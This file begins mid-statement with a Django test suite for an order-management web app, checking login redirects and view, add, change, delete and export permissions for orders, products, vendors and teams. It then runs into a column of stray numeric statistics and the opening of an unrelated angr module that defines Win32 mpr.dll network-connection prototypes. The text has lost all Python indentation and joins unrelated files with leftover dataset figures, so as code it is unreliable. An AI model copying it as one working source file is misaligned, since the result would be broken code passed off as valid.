"comment": comment,
"event": event,
},
)
def test_view_login_required(self):
response = self.client.get("/orders")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/orders")
def test_can_not_see_orders_without_permission_or_membership(self):
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<tbody></tbody>", html=True)
def test_members_can_view_team_orders(self):
self.team_a.members.add(self.user)
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "The A-Team")
self.assertNotContains(response, "Not the A-Team")
def test_view_permission_can_see_all_orders(self):
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "The A-Team")
self.assertContains(response, "Not the A-Team")
def test_non_privileged_can_not_add_order_in_any_state(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
def test_new_order_has_comment_field(self):
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
print(response.content)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<textarea name="comment" cols="30" rows="3" maxlength="1000" class="textarea form-control" id="id_comment">',
)
def test_add_permission_can_add_anything(self):
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 1)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 2)
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 3)
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 4)
def test_request_user_can_request_but_nothing_else(self):
self.view_user.user_permissions.add(self.request_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 1)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "APP is not one of the available choices")
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "REA is not one of the available choices")
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "COM is not one of the available choices")
def test_non_privileged_can_not_change(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order(order.id, "REQ")
self.assertEqual(response.status_code, 403)
def test_change_permission_can_change_anything(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.change_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order(order.id, "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REQ", 2)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REQ", 2, 17.00)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REA")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "COM")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
def test_team_members_can_change_some_fields(self):
self.team_a.members.add(self.user)
my_order = Order.objects.create(product=self.product, team=self.team_a)
order = Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
# we can not change the state
response = self.post_order(my_order.id, "APP")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "APP is not one of the available choices")
# we can change the amount
response = self.post_order(my_order.id, "REQ", 2)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
# we can not change other teams objects
response = self.post_order(order.id, "REQ", 2)
self.assertEqual(response.status_code, 403)
# we can not change the order after it was approved
my_order.state = "APP"
my_order.save()
response = self.post_order(my_order.id, "REQ", 2)
self.assertEqual(response.status_code, 403)
def test_approvers_can_update_state(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.approve_permission)
self.client.login(username="loc_engel", password="loc_engel")
# we can approve a order
response = self.post_order(order.id, "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
# we can no longer change this order
response = self.post_order(order.id, "REQ")
def test_require_no_delete_permission_fails(self):
"""Has to fail because the user has no delete permission and is
not in the team we’re trying to delete the order from"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 1)
def test_require_only_delete_permission_fails(self):
"""Has to fail because the user is not in the team we’re trying to delete the order from"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.delete_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 1)
def test_require_delete_all_teams_permission_ok(self):
"""Has to succeed because the user has the delete_order_all_teams permission"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.delete_all_teams_permission)
self.view_user.user_permissions.add(self.delete_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 0)
def test_team_members_can_delete_orders(self):
"""Has to succeed because the user has the delete_order permission and is member of the team"""
self.team_a.members.add(self.user)
my_order = Order.objects.create(product=self.product, team=self.team_a)
my_approved_order = Order.objects.create(
product=self.product, team=self.team_a, state="APP"
)
order = Order.objects.create(product=self.product, team=self.team_b)
self.user.user_permissions.add(self.delete_permission)
self.client.login(username="engel", password="engel")
response = self.client.post("/orders/delete/{}".format(my_order.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
response = self.client.post("/orders/delete/{}".format(my_approved_order.id))
self.assertEqual(response.status_code, 403)
def test_event_preset_by_setting(self):
env = EnvironmentVarGuard()
env.set("DEFAULT_ORDER_EVENT", "12c3")
self.view_user.user_permissions.add(self.add_permission)
Event.objects.create(name="12c3")
Event.objects.create(name="42c3")
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="2" selected>12c3</option>')
# This test somehow does not work. If you use the software, it works as defined and
# uses the last event that was added
# def test_event_use_last(self):
# self.view_user.user_permissions.add(self.add_permission)
# Event.objects.create(name="12c3")
# Event.objects.create(name="42c3")
# self.client.login(username="loc_engel", password="loc_engel")
# response = self.client.get("/orders/new")
# self.assertEqual(response.status_code, 200)
# print(response.status_code)
# print(response.content)
# self.assertContains(response, '<option value="3" selected>42c3</option>')
def test_event_no_event_defined(self):
Event.objects.all().delete()
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="" selected>---------</option>')
def test_single_team_preset(self):
self.team_a.members.add(self.user)
self.user.user_permissions.add(self.add_permission)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="1" selected>')
def test_status_can_view_only(self):
"""
Tests if a user having only view rights can load the order view for an existing order
"""
Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/1")
self.assertEqual(response.status_code, 200)
class OrderExportViewTests(TestCase):
def setUp(self) -> None:
# Various permission objects for convinience use
self.export_permission = Permission.objects.get(codename="export_csv")
# User without rights
self.user = User.objects.create_user("engel", password="engel")
# a user with view permission, can export CSV
self.view_user = User.objects.create_user("exporter", password="exporter")
self.view_user.user_permissions.add(self.export_permission)
def test_view_login_required(self):
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/orders/export")
def test_non_privileged_can_not_export(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 403)
def test_privileged_can_export(self):
self.client.login(username="exporter", password="exporter")
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 200)
class ProductViewTests(TestCase):
def setUp(self) -> None:
User.objects.create_user("engel", password="engel")
self.vendor = Vendor.objects.create(name="ACME Inc.")
view_permission = Permission.objects.get(codename="view_product")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_product")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_product")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_product")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_new_product_status_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.get("/products/new")
self.assertEqual(response.status_code, 200)
def test_view_login_required(self):
response = self.client.get("/products")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/products")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/products")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/products")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
vendor = Vendor.objects.get(name="ACME Inc.")
response = self.client.post(
"/products/new",
{"name": "Awesome Beer", "unit": "Hectoliter", "vendor": vendor.id},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/products/new", {"name": "Awesome Beer", "unit": "Hectoliter"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.all().count(), 1)
def test_require_change_permission_fails(self):
product = Product.objects.create(name="Bad Beer")
vendor = Vendor.objects.get(name="ACME Inc.")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/products/{}".format(product.id),
{"name": "Awesome Beer", "unit": "Hectoliter", "vendor": vendor.id},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.get(id=product.id).name, "Bad Beer")
def test_require_change_permission_ok(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post(
"/products/{}".format(product.id),
{"name": "Awesome Beer", "unit": "Hectoliter"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.get(id=product.id).name, "Awesome Beer")
def test_require_delete_permission_fails(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/products/delete/{}".format(product.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="morre", password="morre")
response = self.client.post("/products/delete/{}".format(product.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.all().count(), 0)
class VendorViewTests(TestCase):
def setUp(self) -> None:
User.objects.create_user("engel", password="engel")
view_permission = Permission.objects.get(codename="view_vendor")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_vendor")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_vendor")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_vendor")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_login_required(self):
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/vendors")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/vendors/new", {"name": "Bällebäder for the win"},)
self.assertEqual(response.status_code, 403)
self.assertEqual(Vendor.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/vendors/new", {"name": "Bällebäder for the win"},)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(Vendor.objects.all().count(), 1)
def test_require_change_permission_fails(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/vendors/{}".format(vendor.id), {"name": "Bällebäder for the win"},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
Vendor.objects.get(id=vendor.id).name, "Kein Bällebadverkäufer"
)
def test_require_change_permission_ok(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post(
"/vendors/{}".format(vendor.id), {"name": "Bällebäder for the win"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(
Vendor.objects.get(id=vendor.id).name, "Bällebäder for the win"
)
def test_require_delete_permission_fails(self):
vendor = Vendor.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/vendors/delete/{}".format(vendor.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Vendor.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="morre", password="morre")
response = self.client.post("/vendors/delete/{}".format(vendor.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(Vendor.objects.all().count(), 0)
class TeamViewTests(TestCase):
def setUp(self) -> None:
user = User.objects.create_user("engel", password="engel")
view_permission = Permission.objects.get(codename="view_team")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_team")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_team")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_team")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_login_required(self):
response = self.client.get("/teams")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/teams")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/teams")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/teams")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/teams/new", {"name": "Creatures"})
self.assertEqual(response.status_code, 403)
self.assertEqual(Team.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/teams/new", {"name": "Creatures"})
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
self.assertEqual(Team.objects.all().count(), 1)
def test_require_change_permission_fails(self):
team = Team.objects.create(name="BadWolf")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/teams/{}".format(team.id), {"name": "GoodWolf"})
self.assertEqual(response.status_code, 403)
def test_require_change_permission_ok(self):
team = Team.objects.create(name="BadWolf")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/teams/{}".format(team.id), {"name": "GoodWolf"})
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
def test_require_delete_permission_fails(self):
team = Team.objects.create(name="EvilTeam")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/teams/delete/{}".format(team.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Team.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
team = Team.objects.create(name="EvilTeam")
self.client.login(username="morre", password="morre")
response = self.client.post("/teams/delete/{}".format(team.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
self.assertEqual(Team.objects.all().count(), 0)
| 45.848524
| 122
| 0.678323
| 4,341
| 35,716
| 5.402903
| 0.053214
| 0.125991
| 0.098064
| 0.087789
| 0.867144
| 0.815895
| 0.803871
| 0.758549
| 0.728447
| 0.718982
| 0
| 0.011638
| 0.191623
| 35,716
| 778
| 123
| 45.907455
| 0.800707
| 0.041998
| 0
| 0.623794
| 0
| 0.001608
| 0.117775
| 0.007852
| 0
| 0
| 0
| 0
| 0.336013
| 1
| 0.135048
| false
| 0.104502
| 0.009646
| 0.001608
| 0.155949
| 0.001608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8805d7eaa3217f955c133efc048967ed1fc34e64
| 32,688
|
py
|
Python
|
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("mpr.dll")
prototypes = \
{
#
'WNetAddConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpRemoteName", "lpPassword", "lpLocalName"]),
#
'WNetAddConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpRemoteName", "lpPassword", "lpLocalName"]),
#
'WNetAddConnection2A': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection2W': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection3A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection3W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection4A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions"]),
#
'WNetAddConnection4W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions"]),
#
'WNetCancelConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "fForce"]),
#
'WNetCancelConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "fForce"]),
#
'WNetCancelConnection2A': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "dwFlags", "fForce"]),
#
'WNetCancelConnection2W': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "dwFlags", "fForce"]),
#
'WNetGetConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalName", "lpRemoteName", "lpnLength"]),
#
'WNetGetConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalName", "lpRemoteName", "lpnLength"]),
#
